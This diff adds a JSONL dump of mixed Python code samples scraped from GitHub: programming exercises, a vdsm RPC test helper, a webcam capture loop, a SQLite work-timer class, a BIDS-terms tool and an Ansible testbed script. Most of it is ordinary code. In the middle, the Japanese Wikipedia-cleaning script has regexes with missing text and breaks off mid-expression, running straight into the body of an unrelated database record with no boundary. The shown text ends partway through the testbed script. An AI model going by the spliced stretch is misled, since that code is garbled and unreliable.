diff --git "a/1799.jsonl" "b/1799.jsonl" new file mode 100644--- /dev/null +++ "b/1799.jsonl" @@ -0,0 +1,449 @@ +{"seq_id":"25246857107","text":"n, k = map(int, input().split())\n\ncoinList = []\ndptable = [0]*(k+1)\ndptable[0] = 1\n\nfor _ in range(n):\n coinList.append(int(input()))\n\nfor coin in coinList:\n for i in range(1, k+1):\n if i < coin:\n continue\n dptable[i] += dptable[i-coin]\n\nprint(dptable[-1])\n","repo_name":"kha-github/python-coding-team","sub_path":"2021.11.03/2293/ha_2293.py","file_name":"ha_2293.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"} +{"seq_id":"31420092289","text":"# Tuliskan identitas di sini\n# NIM/Nama\t: 16520299/Malik Akbar Hashemi Rafsanjani\n# Nama file\t: pita.py\n# Topik\t\t: Dekomposisi Algoritmik\n# Tanggal\t: 2 April 2021\n# Deskripsi\t: Program menerima masukan sebuah bilangan bulat, misal N dan kemudian menampilkan gambar pita bintang, \n# jika N adalah bilangan bulat ganjil (N > 0). Jika N bukan positif dan/atau bukan ganjil, maka diberikan pesan kesalahan.\n\n\n# Program GambarPita\n# Input: N : integer\n# Output: Jika N > 0 dan ganjil, gambar pita sesuai dengan N\n# Jika tidak, tampilkan pesan kesalahan: \n\n# KAMUS\n# Variabel\n# N : int\n\ndef GambarPita(N):\n# I.S. N > 0 dan N ganjil\n# F.S. Gambar pita dengan lebar sebesar N sesuai spesifikasi soal\n# Lengkapilah kamus lokal dan algoritma prosedur di bawah ini\n if N == 1:\n print(\"*\")\n else:\n print(\"*\"*N)\n for i in range(1, N//2 + 1):\n print(\" \"*i + \"*\"*(N - 2*i))\n for j in range(N//2 - 1,0,-1):\n print(\" \"*j + \"*\" * (N - 2*j))\n print(\"*\"*N)\n\ndef IsValid(N):\n# menghasilkan true jika N positif dan ganjil, false jika tidak\n# Lengkapilah kamus lokal dan algoritma fungsi di bawah ini\n if (N > 0) and (N % 2 == 1):\n return True\n else:\n return False\n\n# ALGORITMA PROGRAM UTAMA\nN = int(input())\nif (IsValid(N)): # lengkapi dengan pemanggilan fungsi IsValid\n GambarPita(N) # lengkapi dengan pemanggilan prosedur GambarPita\nelse: # N tidak positif atau N tidak ganjil\n print(\"Masukan tidak valid\")","repo_name":"malikrafsan/Praktikum-STEI-IF-ITB","sub_path":"Dasar-Pemrograman/PRAKTIKUM-4/RESPONSI/pita.py","file_name":"pita.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"id","doc_type":"code","stars":22,"dataset":"github-code","pt":"71"} +{"seq_id":"45917056428","text":"import httplib\nimport logging\nimport socket\nimport threading\n\nfrom xmlrpclib import Transport, dumps, Fault\nfrom contextlib import contextmanager\nfrom itertools import product\nfrom M2Crypto import SSL\nfrom rpc.BindingXMLRPC import BindingXMLRPC, XmlDetector\nfrom yajsonrpc.stompReactor import StompDetector\nfrom protocoldetector import MultiProtocolAcceptor\nfrom yajsonrpc import JsonRpcClient\nfrom rpc.BindingJsonRpc import BindingJsonRpc\nfrom sslhelper import DEAFAULT_SSL_CONTEXT\n\nPERMUTATIONS = tuple(product((True, False), (\"xml\", \"stomp\")))\n\nTIMEOUT = 3\n\n\nclass FakeClientIf(object):\n log = logging.getLogger(\"FakeClientIf\")\n\n def __init__(self):\n self.threadLocal = threading.local()\n self.irs = True\n self.gluster = None\n\n # API module is redefined for apiTests so we need to add BLANK_UUIDs\n import API\n API.Image.BLANK_UUID = '00000000-0000-0000-0000-000000000000'\n API.StorageDomain.BLANK_UUID = '00000000-0000-0000-0000-000000000000'\n API.Volume.BLANK_UUID = \"00000000-0000-0000-0000-000000000000\"\n\n @property\n def ready(self):\n return True\n\n\n@contextmanager\ndef constructAcceptor(log, ssl, jsonBridge):\n sslctx = DEAFAULT_SSL_CONTEXT if ssl else None\n acceptor = MultiProtocolAcceptor(\"127.0.0.1\", 0, sslctx)\n cif = FakeClientIf()\n\n xml_binding = BindingXMLRPC(cif, cif.log)\n xml_binding.start()\n xmlDetector = XmlDetector(xml_binding)\n acceptor.add_detector(xmlDetector)\n\n json_binding = BindingJsonRpc(jsonBridge)\n json_binding.start()\n stompDetector = StompDetector(json_binding)\n acceptor.add_detector(stompDetector)\n\n thread = threading.Thread(target=acceptor.serve_forever,\n name='Detector thread')\n thread.setDaemon(True)\n thread.start()\n\n try:\n yield acceptor\n finally:\n acceptor.stop()\n json_binding.stop()\n xml_binding.stop()\n\n\n@contextmanager\ndef constructClient(log, bridge, ssl, type):\n sslctx = DEAFAULT_SSL_CONTEXT if ssl else None\n with constructAcceptor(log, ssl, bridge) as acceptor:\n client = None\n if type == \"xml\":\n xml_handler = [h for h in acceptor._handlers if h.NAME == type]\n for (method, name) in bridge.getBridgeMethods():\n xml_handler[0].xml_binding.server.register_function(method,\n name)\n client = create\n else:\n for handler in acceptor._handlers:\n if handler.NAME == type:\n reactor = handler._reactor\n\n if not client:\n client = lambda client_socket: (\n JsonRpcClient(reactor.createClient(client_socket))\n )\n\n def clientFactory():\n return client(create_socket(\n sslctx,\n acceptor._host,\n acceptor._port\n ))\n\n yield clientFactory\n\n\ndef create_socket(sslctx, host, port):\n sock = None\n if sslctx:\n sock = SSL.Connection(sslctx.context)\n else:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(TIMEOUT)\n sock.connect((host, port))\n return sock\n\n\ndef create(socket):\n return XMLClient(socket)\n\n\nclass XMLClient():\n def __init__(self, socket):\n self.socket = socket\n self.transport = CustomTransport(socket)\n\n def send(self, method, params):\n request = dumps(params, method)\n try:\n response = self.transport.request(\"localhost\",\n \"/RPC2\", request)\n except Fault as e:\n response = e.faultString\n\n if isinstance(response, tuple):\n response = response[0]\n return response\n\n def connect(self):\n pass\n\n def setTimeout(self, timeout):\n self.socket.settimeout(timeout)\n\n def close(self):\n self.socket.close()\n\n\nclass CustomTransport(Transport):\n\n def __init__(self, socket):\n Transport.__init__(self)\n\n def connect(self):\n self.sock = socket\n\n connection = httplib.HTTPConnection\n connection.connect = connect\n","repo_name":"Caez83/vdsm","sub_path":"tests/jsonRpcHelper.py","file_name":"jsonRpcHelper.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"} +{"seq_id":"35589681152","text":"import cv2 as cv\nimport time\n\ncamera = cv.VideoCapture(0)\n\nwhile(True):\n ret, image = camera.read()\n ts = time.time()\n name = int(ts)\n cv.imwrite('photos/'+str(name)+'.jpg', image)\n time.sleep(1)\n print(name)\n\ncamera.release()\ncv.destroyAllWindows()","repo_name":"hatrari/OnePhotoEverySecond","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"41457138558","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n### IMPORTANT:\n### 1. has to be run in python2\n### 2. From AA format to complete sentences.\n\n\nimport re\nimport os\n\ndef punctuation(text):\n \"\"\"change all parentheses to to japanese characters\"\"\"\n text = re.sub(r'\\(', '(', text, flags=re.DOTALL) # replace EN L paren w/JP L paren\n text = re.sub(r'\\)', ')', text, flags=re.DOTALL) # replace EN R paren w/JP R paren\n return text\n\narticle_text = []\narticle_folders = os.listdir('./texts/')\n\nfor folder in article_folders:\n shortpath = './texts/' + folder\n print(folder)\n longpath = '/home/greg/NLP/prime/texts/' + folder + '/'\n # filename = 'wikiclean' + folder + '.txt'\n for fn in os.listdir(shortpath):\n print(fn)\n try:\n wikitext = open(os.path.join(longpath, fn), 'r').read()\n except Exception as inst:\n print(fn)\n print(type(inst)) # the exception instance\n print(inst.args) # arguments stored in .args\n print(inst)\n\n wikitext = punctuation(wikitext)\n wikitext = re.sub(r'([\\s\\S]*?)', '', wikitext) # (1) remove category/wikipedia/image entries\n wikitext = re.sub(r'\\n.*\\n', '', wikitext) # (2) remove opening doc tags and article title on following line\n wikitext = re.sub(r'<[ / ]?doc[ / ]?>', '', wikitext) # (3) remove closing doc tags\n wikitext = re.sub(r'<[ / ]?br[ / ]?>', '', wikitext) # (4) remove all variation of linebreaks\n wikitext = re.sub(r'[\\(\\uff08][^\\(\\uff08\\)\\uff09]*[\\)\\uff09]', '', wikitext) # (5) remove parentheticals\n wikitext = re.sub(r'<.*?>([\\s\\S]*?)', '', wikitext) # (6) remove other content between tags\n wikitext = re.sub(r'.+(?= Datetime(?) AND action_type = ? ORDER BY Datetime(time) ASC\", (time, self.end_action))\n result = c.fetchone()\n self.disconnect_from_database(conn)\n return result\n\n def update_row(self, new_project_name, new_time, old_project_name, old_time, action_type):\n conn, c = self.connect_to_database()\n c.execute(\"UPDATE times SET project_name = ?, time = ? WHERE project_name = ? AND time = ? AND action_type = ?;\", (new_project_name, new_time, old_project_name, old_time, action_type))\n self.disconnect_from_database(conn)\n\n def delete_row(self, project_name, time, action_type):\n conn, c = self.connect_to_database()\n c.execute(\"DELETE FROM times WHERE project_name = ? AND time = ? AND action_type = ?;\", (project_name, time, action_type))\n self.disconnect_from_database(conn)\n\n def create_row(self, project_name, time, action_type):\n conn, c = self.connect_to_database()\n c.execute(\"INSERT INTO times (project_name, time, action_type) VALUES (?, ?, ?)\", (project_name, time, action_type))\n self.disconnect_from_database(conn)\n\n def get_dataframe_times(self):\n conn, c = self.connect_to_database()\n df = pd.read_sql_query(\"SELECT times.project_name, times.time, times.action_type FROM times INNER JOIN project_names ON times.project_name = project_names.project_name WHERE is_hidden IS FALSE ORDER BY Datetime(time) ASC, action_type DESC\", conn)\n self.disconnect_from_database(conn)\n return df\n\n def get_dataframe_all_times(self):\n conn, c = self.connect_to_database()\n df = pd.read_sql_query(\"SELECT * FROM times ORDER BY Datetime(time) ASC, action_type DESC\", conn)\n self.disconnect_from_database(conn)\n return df\n","repo_name":"JulienEyzat/work-timer","sub_path":"DatabaseInterface.py","file_name":"DatabaseInterface.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"16648368858","text":"import os,sys\nfrom os import system\nfrom argparse import ArgumentParser\nimport pandas as pd\nfrom pyld import jsonld\nfrom os.path import join\nimport json\nimport tempfile\nimport urllib.request as ur\nfrom urllib.parse import urlparse\n\n\n\n#from .add_term import add_term\n#from .table_utils import generate_pdf,export_markdown_table\ntry:\n from nidm.experiment.Utils import authenticate_github\nexcept ImportError:\n print(\"trying to install required module: PyNIDM\")\n system('python -m pip install --upgrade pip pynidm')\n from nidm.experiment.Utils import authenticate_github\n\n\nfrom github import Github, GithubException\n\n\n\n# Placeholder for GitHub source repo to fork and add new terms to\nGITHUB_SOURCE_REPO = \"https://github.com/nqueder/bids_terms_to_pdf_table\"\n\n# WIP: Placeholder for JSON-LD context file\nCONTEXT = \"https://raw.githubusercontent.com/NIDM-Terms/terms/master/context/cde_context.jsonld\"\n\n\ndef search_term(terms_dict):\n\n print('')\n term_searched = input('Please enter full or partial BIDS term: ')\n print('')\n print('Searching for BIDS terms')\n print('')\n\n\n searched_keys = []\n\n # dictionary that will hold terms in lower case as keys and original terms as values\n temp_dict = {}\n\n num_selector = 1\n\n\n #convert the input term or searched term to all lower case\n lower_searched = term_searched.lower()\n\n\n for lower_key in terms_dict.keys():\n temp_dict[lower_key] = lower_key\n\n\n #covert all of the keys in temp dict to lower case to search terms\n term_lower = {k.lower(): v for k, v in temp_dict.items()}\n\n\n for key, value in term_lower.items():\n\n\n if lower_searched in key:\n print('%d. %s : %s'% (num_selector,term_lower[key],terms_dict[term_lower[key]]['description']))\n num_selector = num_selector + 1\n searched_keys.append(term_lower[key])\n\n\n # ask the user for entry and ensure that they're selecting a valid number\n if len(searched_keys) > 0:\n print('')\n input_number = input('Please choose from the terms above or return to go back to main menu: ')\n if input_number == \"\":\n print('No term selected, returning to main menu')\n return\n else:\n input_number = int(input_number)-1\n\n if not (input_number < 0) and (input_number > (len(searched_keys)-1)):\n print('')\n print('---------------------------------------------------------------')\n print('')\n print('Please select a valid entry...')\n else:\n term_selected = searched_keys[input_number]\n return term_selected\n\n else:\n print('')\n print('NO MATCHING BIDS TERMS HAVE BEEN FOUND...')\n return\n\n\n\ndef select_term(terms_dict,bids_terms):\n\n #sort items in alphabetical order so its easier for the user to choose terms\n #bids_terms = bids_terms.sort()\n\n retry = 'retry'\n\n keys_list = []\n\n num_selector = 1\n for key, value in terms_dict.items():\n print('')\n print('%d. %s : %s'% (num_selector,key,terms_dict[key]['description']))\n num_selector = num_selector + 1\n keys_list.append(key)\n #stor a temp list of keys, go to list entry 10 and see what 10 maps to\n\n print('')\n\n # ask the user for entry and ensure that they're selecting a valid number\n input_number = input('Please choose from the terms above or return to go back to main menu: ')\n if input_number == \"\":\n print('')\n print('---------------------------------------------------------------')\n print('')\n print('No terms selected, returning to the main menu...')\n return\n else:\n input_number = int(input_number)-1\n if (input_number < 0) or (input_number > (len(keys_list)-1)):\n print('')\n return retry\n else:\n term_selected = keys_list[input_number]\n return term_selected\n\n\ndef load_available_properties(terms_dict):\n '''\n Takes union of all properties available for current BIDS terms\n :return: list of available properites\n '''\n\n property_list = []\n\n # go through each BIDS terms label and get properties\n for label,property_dict in terms_dict.items():\n # then loop through properties and add property if not already added\n for property, value in property_dict.items():\n if (property not in property_list) and (property != \"@type\") and (property != \"@context\"):\n # if property isn't in our list add it\n property_list.append(property)\n\n return property_list\n\n\n\ndef main(agrv):\n\n parser = ArgumentParser(description='This tool will allow the user to search across existing BIDS terms allowing for '\n 'creation of a Markdown table for the BIDS specification documents. The tool will also'\n 'allow the user to add new BIDS terms, which will result in JSON-LD files added to '\n '\"bids_terms_to_pdf_table\" Github repository')\n\n parser.add_argument('-in', dest='in_dir', required=True, help='Path to cloned \"bids_terms_to_pdf_table\" Github repository')\n parser.add_argument('-out', dest= 'out_dir', required=True, help='Path to output directory: only required if you would like'\n ' to export a PDF table of BIDS specification terms')\n parser.add_argument('-github',dest='github',required=False,help='WIP: Optional username,password or username,token for your'\n 'GitHub account. If not defined then software will ask on'\n 'command line if you create a new BIDS term. The source repo'\n 'will be forked into your user space and generate a new pull'\n 'request for the new term to be added to the BIDS terminology.' )\n\n\n\n args = parser.parse_args()\n\n\n #Set paths to input and output directory\n path_to_jld = os.path.join(args.in_dir,'BIDS_Terms')\n path_to_out = args.out_dir\n\n #read dictionary that defines our properties\n path_to_prop_def = os.path.join(args.in_dir,'utils/property_def.json')\n with open (path_to_prop_def) as f:\n prop_def = json.load(f)\n\n\n #List all existing BIDS terms JSON-LD files\n bids_terms_ = os.listdir(path_to_jld)\n\n # all currently available BIDS terms\n bids_terms = []\n # terms selected for pdf table\n selected_terms = []\n # list of term properties selected for inclusion in PDF table\n selected_properties = []\n # term properties available\n available_properties = []\n # dict of all terms\n terms_dict = {}\n\n\n #Loop through the terms in bids_terms_ takeout the \".jsonld\" extention\n file_count = 0\n for t in bids_terms_:\n if file_count % 50 == 0:\n done=str(int((float(file_count)/len(bids_terms_))*100))\n print(\" Loading existing BIDS terms: %s%% %s\"%(done,\"\\r\"))\n if t.startswith(\".\"):\n continue\n path_to_term = os.path.join(path_to_jld, t)\n with open (path_to_term) as p:\n term_dict = json.load(p)\n terms_dict[term_dict['label']] = term_dict\n file_count = file_count + 1\n\n #Present the user with instructions\n print('\\nUsing the table below, select terms to be added to a Markdown table')\n print('Select an existing term and repeat until you have added all the terms you want in the table')\n print('Once complete, select 4 to create the Markdown table')\n print('If you want to add a new term, select option 3 and add the various term properties\\n')\n\n\n\n while True:\n # print options for the user to select from\n print('')\n print('---------------------------------------------------------------')\n print('1. Select a term')\n print('2. Search terms')\n print('3. Add new term')\n print(\"4. Create Markdown table of selected terms (%s)\" % selected_terms)\n print('5. Exit')\n print('---------------------------------------------------------------')\n print('')\n\n #Allow the user to input a number that correspond to their choice\n num = int(input('Please choose from the options above: '))\n\n if (num < 1) or (num > 5):\n print(\"Please select a valid option (1-4)\")\n continue\n\n if num == 1:\n sel_temp = select_term(terms_dict,bids_terms)\n if sel_temp == 'retry':\n print('---------------------------------------------------------------')\n print('')\n print('Please select a valid entry...')\n print('')\n print('---------------------------------------------------------------')\n sel_temp = select_term(terms_dict,bids_terms)\n if sel_temp in selected_terms:\n print('')\n print('This term has already been added to your list, please select a different term...')\n elif not sel_temp in selected_terms and sel_temp != 'retry':\n selected_terms.append(sel_temp)\n\n if num == 2:\n sear_temp = search_term(terms_dict)\n if sear_temp is None:\n continue\n else:\n if sear_temp in selected_terms:\n print('')\n print('This term has already been added to your list, please select a different term...')\n elif not sear_temp in selected_terms:\n selected_terms.append(sear_temp)\n\n # adding a new BIDS term\n if num == 3:\n # create new BIDS term and save to new dictionary\n new_term = add_term(terms_dict)\n print(\"New BIDS term created. Adding to BIDS terms dictionary and generating a GitHub pull request...\")\n\n # add new_term dictionary to existing bids_terms dictionary\n terms_dict.update(new_term)\n\n\n\n # try and open context file for JSON-LD\n #try to open the url and get the pointed to file\n try:\n #open url and get file\n opener = ur.urlopen(CONTEXT)\n # write temporary file to disk and use for stats\n temp = tempfile.NamedTemporaryFile(delete=False)\n temp.write(opener.read())\n temp.close()\n context_file = temp.name\n # read in jsonld context\n with open(context_file) as context_data:\n context = json.load(context_data)\n except:\n print(\"ERROR! Can't open url: %s\" %CONTEXT)\n print(\"Won't be able to write your new term to JSON-LD....\")\n print(\"Will write it as JSON to output directory for now to save the work\")\n with open(join(args.out_dir,str((new_term.key())[0]) + \".json\"),'w') as fp:\n json.dump(new_term,fp,indent=4)\n continue\n\n # write the new term JSON-LD file to the output directory\n # open a new dictionary\n doc = {}\n\n #add type as schema.org/DataElement\n doc['@type'] = context['@context']['DataElement']\n\n # copy over new_term dictionary items given the context file mappings between dictionary\n # keys and urls\n for key,subdict in new_term.items():\n for property,value in subdict.items():\n doc[context['@context'][property]] = value\n\n # create the association\n # add property to specify that the term is associated with NIDM\n doc[context['@context']['associatedWith']] = [str('NIDM'),str('BIDS')]\n\n # create compacted jsonld\n compacted = jsonld.compact(doc,CONTEXT)\n\n # try to fork the GITHUB_SOURCE_REPO into the user's github space and\n # commit the new JSON-LD file and do a pull request\n try:\n # git fork of main BIDS terms repo into user's github space\n if args.github:\n git_auth,github_obj = authenticate_github(credentials=args.github)\n else:\n git_auth,github_obj = authenticate_github(credentials=[])\n\n # fork source repo if not already in user's GitHub space\n # get github user\n github_user = github_obj.get_user()\n # create fork\n user_fork = github_user.create_fork(GITHUB_SOURCE_REPO)\n\n #user_fork.create_file(\"test.txt\", \"test\", \"test\", branch=\"test\")\n # write new term to JSON-LD file to user's forked github space\n\n # do a git commit\n\n # do a git push\n\n # issue a pull request to main BIDS terms repo\n except:\n e = sys.exc_info()[0]\n print(\"Error adding your new term to forked GitHub repository.\")\n print(\"Writing JSON-LD file (%s) to the output directory.\"\n %join(args.out_dir,list(new_term.keys())[0] + \".jsonld\"))\n print(\"You'll need to submit this new term to the GitHub repo yourself!\")\n\n # write jsonld file to output directory....\n with open(join(args.out_dir,list(new_term.keys())[0] + \".jsonld\"),'w') as fp:\n json.dump(compacted,fp,indent=4)\n\n\n\n # adding properties for table creation\n if num == 4:\n num_selectors = 1\n property_list = load_available_properties(terms_dict)\n while True:\n print(\"Please select which properties to include in the the table:\")\n print(\"Properties selected: %s\" %selected_properties)\n\n for property in property_list:\n \n if property in prop_def.keys():\n print(\"%d. %s : %s\" %(num_selectors, property,prop_def[property]))\n else:\n print(\"%d. %s\" %(num_selectors, property))\n\n num_selectors = num_selectors + 1\n\n print(\"%d. Done Selecting, Create Markdown!\" % num_selectors)\n #Allow the user to input a number that correspond to their choice\n property = int(input('Please choose from the following options: '))\n\n if (property<1) or (property > (len(property_list))+1):\n continue\n # if they selected the \"Done\" selection then exit this loop\n elif property == num_selectors:\n break\n # if they selected a property add it to the selected properties list for PDF table\n else:\n selected_properties.append(property_list[property-1])\n num_selectors = 1\n\n\n # create PDF table and exist loop\n export_markdown_table(term_dictionary=terms_dict,selected_properties=selected_properties,selected_terms=selected_terms,\n file_name=join(args.out_dir,\"test.md\"))\n #generate_pdf(term_dictionary=terms_dict,selected_properties=selected_properties,selected_terms=selected_terms,\n # file_name=join(args.out_dir,\"test.pdf\"))\n\n #generate_pdf_pdfkit(term_dictionary=terms_dict,selected_properties=selected_properties,selected_terms=selected_terms,\n # file_name=join(args.out_dir,\"test.pdf\"))\n # break\n\n # if the user wants to exit without creating a PDF table\n if num == 5:\n exit(0)\n\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n\n","repo_name":"nqueder/bids_terms_to_markdown_table","sub_path":"utils/bidsterms2pdf.py","file_name":"bidsterms2pdf.py","file_ext":"py","file_size_in_byte":15864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"26032982621","text":"# 이분 그래프\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\n\n# def bfs(vertex):\n# q = deque()\n# q.append([vertex, 0])\n# while q:\n# v, t = q.popleft()\n# team[v] = t\n# if v not in graph:\n# continue\n# for i in graph[v]:\n# if team[i] == -1:\n# q.append([i, 1-t])\n# elif team[i] == t:\n# return False\n# return True\n\nimport sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10**9)\n\ndef dfs(vertex):\n if team[vertex] == -1:\n team[vertex] = 0\n t = team[vertex]\n\n if vertex not in graph:\n return True\n \n for i in graph[vertex]:\n if team[i] == -1:\n team[i] = 1 - t\n if not dfs(i):\n return False\n elif team[i] == t:\n return False\n return True\n\n\nT = int(input())\nfor _ in range(T):\n graph = {}\n v, e = map(int, input().split())\n for i in range(e):\n a, b = map(int, input().split())\n if a in graph:\n graph[a].append(b)\n else:\n graph[a] = [b]\n if b in graph:\n graph[b].append(a)\n else:\n graph[b] = [a]\n team = [-1] * (v+1)\n \n flag = True\n for i in range(1, v+1):\n if team[i] == -1:\n if not dfs(i):\n flag = False\n break\n if not flag:\n print(\"NO\")\n else:\n print(\"YES\")","repo_name":"skdus531/algorithm","sub_path":"GRAPH/BOJ1707.py","file_name":"BOJ1707.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"12423686104","text":"\nimport time\n# list comprehension vs for loop\n\n# using for loop..\n\ncharList = []\n\nfor char in 'character list':\n charList.append(char)\n\nprint(\"charList:\", charList)\n# output: charList: ['c', 'h', 'a', 'r', 'a', 'c', 't', 'e', 'r', ' ', 'l', 'i', 's', 't']\n\n# using list comprehension..\ncharListComp = [char for char in 'character list']\nprint(\"charListComp:\", charListComp)\n# output: charListComp: ['c', 'h', 'a', 'r', 'a', 'c', 't', 'e', 'r', ' ', 'l', 'i', 's', 't']\n\n# ------------------------------------\n\n# time analysis | list comprehension vs for loop\n\nresultList = []\n\n\ndef expoFun(num):\n for i in range(num):\n resultList.append(i**2)\n return resultList\n\n\nbegin = time.time()\nexpoFun(10**6)\nend = time.time()\n\nprint(\"time taken by for loop:\", round(end-begin, 2))\n\n\ndef compreFun(n):\n return [i**2 for i in range(n)]\n\n\nbegin = time.time()\ncompreFun(10**6)\nend = time.time()\nprint(\"time taken by comprehension:\", round(end-begin, 2))\n","repo_name":"kvarad6/python-basics","sub_path":"listComprehension.py","file_name":"listComprehension.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"3813085056","text":"from shutil import copyfile\nimport yaml\nimport datetime\nimport os\nimport argparse\n\n\"\"\"\"\nTestbed Processing\n\nRequirement:\n python version: 2.X\n python package: PyYAML 3.12 (or later)\n\nPyYaml Install Instructions:\n [1] Download PyYAML from https://pyyaml.org/wiki/PyYAML\n [2] Unpack the archive\n [3] Install the package by executing (python setup.py install)\n [4] Test if installation was successful (python setup.py test)\n\nUsage:\n put TestbedProcessing.py and testbed.yaml under sonic-mgmt/ansible\n python TestbedProcessing.py\n python TestbedProcessing.py -i testbed.yaml\n\nArguments:\n -i : the testbed.yaml file to parse\n -basedir : the basedir for the project\n -backupdir : the backup directory for the files\n\nScript Procedure\n [1] Backup the files we will be copying\n [2] Load testbed.yaml into dictionaries for easy processing\n [3] Generate the files via methods defined below\n\"\"\"\n\n# ARGUMENTS TO PARSE\nparser = argparse.ArgumentParser(description=\"Process testbed.yml file\")\nparser.add_argument('-i', help='a file for the testbed processing script', nargs=\"?\", default=\"testbed-new.yaml\")\nparser.add_argument('-basedir', help='base directory to find the files, points to /sonic-mgmt/ansible', default=\"\")\nparser.add_argument('-backupdir', help='backup directory to store files, points to /sonic-mgmt/ansible/backup',nargs=\"?\", default=\"backup\")\nargs = parser.parse_args()\n\n# FILES TO BACKUP\nmain_file = \"group_vars/vm_host/main.yml\"\nvmHostCreds_file = \"group_vars/vm_host/creds.yml\"\nlabLinks_file = \"files/sonic_lab_links.csv\"\ntestbed_file = \"testbed.csv\"\ndevices_file = \"files/sonic_lab_devices.csv\"\neosCred_file = \"group_vars/eos/creds.yml\"\nfanoutSecrets_file = \"group_vars/fanout/secrets.yml\"\nlabSecrets_file = \"group_vars/lab/secrets.yml\"\nlab_file = \"lab\"\ninventory_file = \"inventory\"\ndockerRegistry_file = \"vars/docker_registry.yml\"\nveos_file = \"veos\"\n# the number of host_var files vary. therefore, backup process creates a list of all files under host_vars folder, iterates through the list, and copies them to backup directory\n\n#Backup List\n#backupList does not encompass host_var files because the number of host_var files vary. therefore, backup process creates a list of all files under host_vars folder, iterates through the list, and copies them to backup directory\nbackupList = []\nbackupList.append(main_file)\nbackupList.append(vmHostCreds_file)\nbackupList.append(labLinks_file)\nbackupList.append(testbed_file)\nbackupList.append(devices_file)\nbackupList.append(eosCred_file)\nbackupList.append(fanoutSecrets_file)\nbackupList.append(labSecrets_file)\nbackupList.append(lab_file)\nbackupList.append(inventory_file)\nbackupList.append(dockerRegistry_file)\nbackupList.append(veos_file)\n\n#Backup Directories\nnow = datetime.datetime.now()\ntimestamp = str(now.month) + \"_\" + str(now.day) + \"_\" + str(now.year) + \"_\" + str(now.hour) + str(now.minute) + \"_\" + str(now.second)\nos.makedirs(args.backupdir + \"/\" + timestamp) # create folder in backup directory labeled with the current timestamp\nos.makedirs(args.backupdir + \"/\" + timestamp + \"/files\") # create files folder under the timestamped folder\nos.makedirs(args.backupdir + \"/\" + timestamp + \"/host_vars\") # create host_vars folder under the timestamped folder\nos.makedirs(args.backupdir + \"/\" + timestamp + \"/group_vars\") # create group_vars folder under the timestamped folder\nos.makedirs(args.backupdir + \"/\" + timestamp + \"/group_vars/eos\") # create group_vars/eos folder under the timestamped folder\nos.makedirs(args.backupdir + \"/\" + timestamp + \"/group_vars/fanout\") # create group_vars/fanout folder under the timestamped folder\nos.makedirs(args.backupdir + \"/\" + timestamp + \"/group_vars/lab\") # create group_vars/lab folder under the timestamped folder\nos.makedirs(args.backupdir + \"/\" + timestamp + \"/group_vars/vm_host\") # create group_vars/vm_host folder under the timestamped folder\nos.makedirs(args.backupdir + \"/\" + timestamp + \"/vars\") # create vars folder under the timestamped folder\n\n\"\"\"\nrepresent_none(self, _)\nmodifies yaml to replace null values with blanks\nSOURCE: https://stackoverflow.com/questions/37200150/can-i-dump-blank-instead-of-null-in-yaml-pyyaml/37201633#3720163\n\"\"\"\ndef represent_none(self, _):\n return self.represent_scalar('tag:yaml.org,2002:null', '')\nyaml.add_representer(type(None), represent_none)\n\n\n\"\"\"\ngenerateDictionary(data, result, category)\n@:parameter data - the dictionary to iterate through\n@:parameter result - the resulting dictionary\nGenerates the dictionaries that are used when creating csv, yml, or text files\n\"\"\"\ndef generateDictionary(data, result, category):\n for key, value in data[category].items():\n result.update({key: value})\n\n\n\"\"\"\nmakeMain(data, outfile)\n@:parameter data - the dictionary to look through\n@:parameter outfile - the file to write to\nmakeMain generates the vm_host/main.yml file\nit pulls two sets of information; dictionary data and proxy data\n\"\"\"\ndef makeMain(data, outfile):\n veos = data\n dictData = {\n \"root_path\": veos.get(\"root_path\"),\n \"vm_images_url\": veos.get(\"vm_images_url\"),\n \"cd_image_filename\": veos.get(\"cd_image_filename\"),\n \"hdd_image_filename\": veos.get(\"hdd_image_filename\"),\n \"skip_image_downloading\": veos.get(\"skip_image_downloading\"),\n \"vm_console_base\": veos.get(\"vm_console_base\"),\n \"memory\": veos.get(\"memory\"),\n \"max_fp_num\": veos.get(\"max_fp_num\"),\n \"ptf_bp_ip\": veos.get(\"ptf_bp_ip\"),\n \"ptf_bp_ipv6\": veos.get(\"ptf_bp_ipv6\")\n }\n proxy = {\n \"proxy_env\": {\n \"http_proxy\": veos.get(\"proxy_env\").get(\"http_proxy\"),\n \"https_proxy\": veos.get(\"proxy_env\").get(\"https_proxy\")\n }\n }\n with open(outfile, \"w\") as toWrite:\n yaml.dump(dictData, stream=toWrite, default_flow_style=False)\n toWrite.write(\"# proxy\\n\")\n yaml.dump(proxy, stream=toWrite, default_flow_style=False)\n\n\n\"\"\"\nmakeVMHost_cred(data, outfile)\n@:parameter data - the dictionary to look for (in this case: veos)\n@:parameter outfile - the file to write to\ngenerates /group_vars/vm_host/creds.yml\npulls ansible_user, ansible_password, ansible_become_pass from vm_host_ansible into a dictionary\n\"\"\"\ndef makeVMHostCreds(data, outfile):\n veos = data\n result = {\n \"ansible_user\": veos.get(\"vm_host_ansible\").get(\"ansible_user\"),\n \"ansible_password\": veos.get(\"vm_host_ansible\").get(\"ansible_password\"),\n \"ansible_become_pass\": veos.get(\"vm_host_ansible\").get(\"ansible_become_pass\")\n }\n with open(outfile, \"w\") as toWrite:\n toWrite.write(\"---\\n\")\n 